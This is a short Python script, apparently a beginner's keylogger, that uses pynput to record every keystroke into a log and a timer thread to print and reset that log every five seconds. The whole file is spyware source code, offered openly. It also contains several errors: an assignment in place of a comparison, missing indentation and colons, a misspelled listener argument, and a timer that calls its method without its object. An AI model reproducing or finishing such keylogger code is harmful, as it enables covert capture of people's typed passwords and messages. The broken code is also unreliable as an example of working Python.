#!usr/bin/python

import pynput.keyboard
import threading


class Keylogger:

def __init__(self):
   self.log=""

def process_key_press(self,key):
    try:
        self.log=self.log+str(key.char)
    except AttributeError:
        if key=key.space
           self.log=self.log+" "
        else:
            self.log=self.log+" "+str(key)+" "    
    
    print(self.log)


#We are using threading concept to report the log for a certain period of time. This threading allowas the keyboard listener function to execute without any interruption and also it runs timer on other hand. 

def report(self): 
    print(self.log)
    self.log=" "
    timer=threading.Timer(5, report)
    timer.start()

keyboard_listener=pynput.keyboard.Listener(on_pres2s=process_key_press)

with keyboard_listener:
    keyboard_listener.join()